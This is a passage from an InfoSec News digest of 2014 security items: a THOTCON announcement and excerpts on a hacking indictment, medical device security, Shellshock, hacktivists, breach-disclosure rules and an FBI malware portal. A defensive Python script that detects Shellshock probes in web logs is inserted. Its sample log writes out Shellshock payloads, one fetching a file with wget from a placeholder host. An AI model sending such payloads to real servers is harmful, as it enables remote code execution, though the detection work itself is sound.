[ISN] THOTCON 0x6 – Chicago’s Hacking Conference – Ticket Sales and CFP Opens 10.01.2014

Forwarded from: THOTCON NFP

***BEGIN THOTCON TRANSMISSION***

Greetings InfoSec News Readers

What: THOTCON 0x6 – Chicago’s Hacking Conference
When: 05.14-15.15
Where: TOP_SECRET / совершенно секретно / 絕密
Tickets: Tickets on Sale 10.01.2014
Call For Papers: CFP Opens 10.01.2014
T-Shirt Contest: Open!
Hacker Brew Contest: Registration Opens 10.01.2014

B3 S0c14l:
LinkedIn http://www.linkedin.com/groups?mostPopular=&gid=3218013
Twitter http://twitter.com/THOTCON
IRC/freenode/#THOTCON

THOTCON (pronounced ˈthȯt and taken from THree – One – Two) is a small venue hacking conference based in Chicago IL, USA. This is a non-profit, non-commercial event looking to provide the best conference possible on a very limited budget. Once you attend a THOTCON event, you will have experienced one of the best information security conference experiences combined with a uniquely casual and social experience.

THOTCON 0x6 is the sixth incarnation of this event and will be held on Thursday and Friday May 14-15, 2015. It will be held at a location only to be disclosed to attendees and speakers during the week before the event.

For more information, explore this site or contact us at info (at) thotcon.org.

http://thotcon.org/

***END THOTCON TRANSMISSION***

[ISN] Hackers charged with stealing over $100m in US army and Xbox technology

http://www.theguardian.com/technology/2014/sep/30/four-hackers-charged-stealing-xbox-army-technology

By Nicky Woolf
theguardian.com
30 September 2014

Four men have been charged with breaking into the computer systems of Microsoft, the US army and leading games manufacturers, as part of an alleged international hacking ring that netted more than $100m in intellectual property, the US Department of Justice said on Tuesday.

The four, aged between 18 and 28, are alleged to have stolen Xbox technology, Apache helicopter training software and pre-release copies of games such as Call of Duty: Modern Warfare 3, according to an indictment dating from April that was unsealed on Tuesday.

Two of the hackers pleaded guilty earlier in the day, the DoJ said.

“These were extremely sophisticated hackers … Don’t be fooled by their ages,” assistant US attorney Ed McAndrew said after a court hearing on Tuesday.

[…]

[ISN] How are hospitals handling medical device security?

http://healthitsecurity.com/2014/09/30/how-are-hospitals-handling-medical-device-security/

By Patrick Ouellette
Health IT Security
September 30, 2014

Dale Nordenberg, moderator of the medical device security panel discussion at this year’s HIMSS Privacy and Security Forum, made an interesting point in saying that medical devices fit somewhere between BioMed, IT and security. Given the likelihood that they fall through the cracks, what are the best ways for healthcare organizations to monitor the risks associated with these devices?

Nordenberg, a medical device expert, discussed security experiences and safeguard tactics with panelists Kristopher Kusche, VP of Information Services, Technology Services at Albany Medical Center, and Darren Lacey, Chief Information Security Officer (CISO) of Johns Hopkins University and Johns Hopkins Medicine.

The first major topic of conversation was the manner in which Kusche approaches risk assessments for medical devices. Kusche said he had 20,000 medical devices across two hospitals, which outnumbers the 18,000 managed IT products, such as computers, the organization has on the network. As a Joint Commission accredited hospital, he said that Albany Medical Center has been assessing every device for risk for a long time because it was a Joint Commission requirement. The only major difference now is the addition of cybersecurity to that risk assessment.

“When the FDA released its cybersecurity recommendations in June 2013, we took them to heart,” he said. “After having done full cybersecurity assessments for our IT components and systems for HIPAA, the next logical step was to perform assessments on medical devices.”

[…]

[ISN] Shellshock fixes beget another round of patches as attacks mount

http://arstechnica.com/security/2014/09/shellshock-fixes-beget-another-round-of-patches-as-attacks-mount/

By Sean Gallagher
Ars Technica
Sept 30 2014

Over the past few days, Apple, Red Hat, and others have pushed out patches to vulnerabilities in the GNU Bourne Again Shell (bash). The vulnerabilities previously allowed attackers to execute commands remotely on systems that use the command parser under some conditions—including Web servers that use certain configurations of Apache. However, some of the patches made changes that broke from the functionality of the GNU bash code, so now debate continues about how to “un-fork” the patches and better secure bash.

At the same time, the urgency of applying those patches has mounted as more attacks that exploit the weaknesses in bash’s security (dubbed “Shellshock”) have appeared. In addition to the threat first spotted the day after the vulnerability was made public, a number of new attacks have emerged. While some appear to simply be vulnerability scans, there are also new exploit attempts that carry malware or attempt to give the attacker direct remote control of the targeted system.

Stormy weather

On Monday, the SANS Technology Institute’s Internet Storm Center (ISC) elevated its INFOcon threat level—a measure of the danger level of current Internet “worms” and other threats based on Internet traffic—to Yellow. This level indicates an attack that poses a minor threat to the Internet’s infrastructure as a whole with potential significant impact on some systems.

Johannes Ullrich, Dean of Research at SANS, noted that six exploits based on Shellshock have been recorded by the ISC’s servers and “honeypot” systems. (A honeypot is a virtual or physical computer system set up to entice attackers and record their actions.) Three of the types of attacks recorded by the ISC were simply scans for the vulnerability. One ran checks using multiple Hypertext Transfer Protocol (HTTP) headers to test if the system would send back Internet Protocol “ping” messages using a bash exploit; another attempted to send back system parameters (the Unix name of the system, its operating system and version, and other details about the hardware). These may have been launched by “white hat” security firms conducting surveys of vulnerable systems.

[…]
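The article describes Shellshock probes arriving in HTTP headers that a CGI-enabled web server copies into bash's environment, and sorts them into vulnerability scans (ping, uname) versus attempts to drop malware. The following is an added example, not part of the Ars Technica article or of any ISC tooling, showing how a defender can triage a web server's access log for those probes. It assumes the Apache/nginx "combined" log format; the log lines, IP addresses and payload strings below are constructed for the example.

```python
import re
from collections import Counter

# Apache/nginx "combined" log format (assumed for the constructed sample below).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Shellshock triggers on the bash function-definition prefix "() {" found in any
# environment variable; CGI hands Referer and User-Agent to scripts as env vars,
# so that prefix inside a header value is the thing worth alerting on.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')

# Keyword heuristics mirroring the article's taxonomy: recon scans (ping, uname)
# versus attempts to fetch a second stage. Purely illustrative, not exhaustive.
DOWNLOAD_RE = re.compile(r'\b(wget|curl|tftp)\b')
RECON_RE = re.compile(r'\b(ping|uname|whoami|id)\b')


def classify(payload):
    """Label a matched header value by apparent intent."""
    p = payload.lower()
    if DOWNLOAD_RE.search(p):
        return "download"
    if RECON_RE.search(p):
        return "recon"
    return "other"


def find_probes(lines):
    """Return one record per header field carrying the Shellshock prefix."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.rstrip("\n"))
        if not m:
            continue  # unparseable line; a real deployment would count these too
        for field in ("referer", "agent", "request"):
            value = m.group(field)
            if SHELLSHOCK_RE.search(value):
                hits.append({
                    "ip": m.group("ip"),
                    "time": m.group("ts"),
                    "field": field,
                    "payload": value,
                    "kind": classify(value),
                })
    return hits


def summarize(hits):
    """Count probes per source address, useful for blocklists and escalation."""
    return Counter(h["ip"] for h in hits)


# Constructed sample log: two recon-style probes, one second-stage fetch, one
# benign request and one malformed line. Addresses are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.10 - - [25/Sep/2014:10:01:02 +0000] "GET /cgi-bin/status HTTP/1.1" '
    '200 12 "-" "() { :;}; /bin/ping -c 1 198.51.100.5"',
    '198.51.100.7 - - [25/Sep/2014:10:02:30 +0000] "GET /index.html HTTP/1.1" '
    '200 4321 "http://example.com/" "Mozilla/5.0"',
    '192.0.2.44 - - [25/Sep/2014:10:03:11 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" '
    '200 12 "() { :;}; /bin/uname -a" "curl/7.30"',
    '203.0.113.10 - - [25/Sep/2014:10:04:55 +0000] "GET /cgi-bin/status HTTP/1.1" '
    '200 12 "-" "() { :;}; /usr/bin/wget -O /tmp/x http://203.0.113.10/x"',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    probes = find_probes(SAMPLE_LOG)
    for p in probes:
        print(f'{p["time"]} {p["ip"]:<14} {p["field"]:<8} {p["kind"]:<9} {p["payload"]}')
    print("per-source counts:", dict(summarize(probes)))
```

Feed it a real access log with `find_probes(open("/var/log/apache2/access.log"))`. The signature matches the prefix rather than any particular command, so it also catches probes the keyword classifier labels "other"; the classifier exists only to prioritise review, since a "download" hit on a host that was unpatched at the time deserves an incident ticket rather than a blocklist entry.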

[ISN] Hackers cut deal to work for gov’t

http://phnompenhpost.com/national/hackers-cut-deal-work-gov%E2%80%99t

Buth Reaksmey Kongkea
The Phnom Penh Post
1 October 2014

Two members of “hacktivist” group Anonymous Cambodia convicted of computer hacking yesterday will be spared further jail time. Instead, they have been ordered to put their “excellent” IT skills to use combating cybercrime in the Ministry of Interior.

Bun King Mongkolpanha, 21, alias “Black Cyber”, and Chou Songheng, 20, alias “Zoro”, were found guilty of IT offences under two articles of the criminal code at Phnom Penh Municipal Court yesterday morning and sentenced to two years in prison. But their sentences were reduced to five months and 20 days – the amount of time they have already spent in prison since being arrested in April – and they are to be released today.

The two former SETEC Institute students are to soon begin paid work fighting cybercrime with the same Interior Ministry department that worked with the FBI to arrest them after an eight-month investigation.

[…]

[ISN] Contractors, Expect 72-hour Rule for Disclosing Corporate Hacks

http://www.nextgov.com/cybersecurity/2014/09/contractors-expect-72-hour-rule-disclosing-corporate-hacks/95399/

By Aliya Sternstein
Nextgov
September 29, 2014

Look for the whole government to take a page from the Pentagon and require that firms notify their agency customers of hacks into company-owned systems within three days of detection, procurement attorneys and federal officials say.

Right now, vendors only have to report compromises of classified information and defense industry trade secrets. The trade secret rule is new and covers breaches of nonpublic military technological and scientific data, referred to as “unclassified controlled technical information.” That new reporting requirement kicked in Nov. 18, 2013 and applies to all military contracts inked since.

The rule “is impactful in large part because it is one of the first very clear cybersecurity directives,” said Anuj Vohra, a Covington & Burling senior associate in the firm’s government contracts practice. “We’ll see more regulations like that among nondefense agencies.”

[…]

[ISN] FBI releases Malware Investigator portal to industry players

http://www.zdnet.com/fbi-releases-malware-investigator-portal-to-industry-players-7000034186/

By Charlie Osborne
Zero Day
ZDNet News
September 30, 2014

The FBI’s Malware Investigator portal will soon be available to security researchers, academics and businesses.

As reported by Threatpost, the US law enforcement agency’s tool is akin to systems used by cybersecurity companies to upload suspicious files. Once a file is uploaded, the system pushes through antimalware engines to pull out information on the file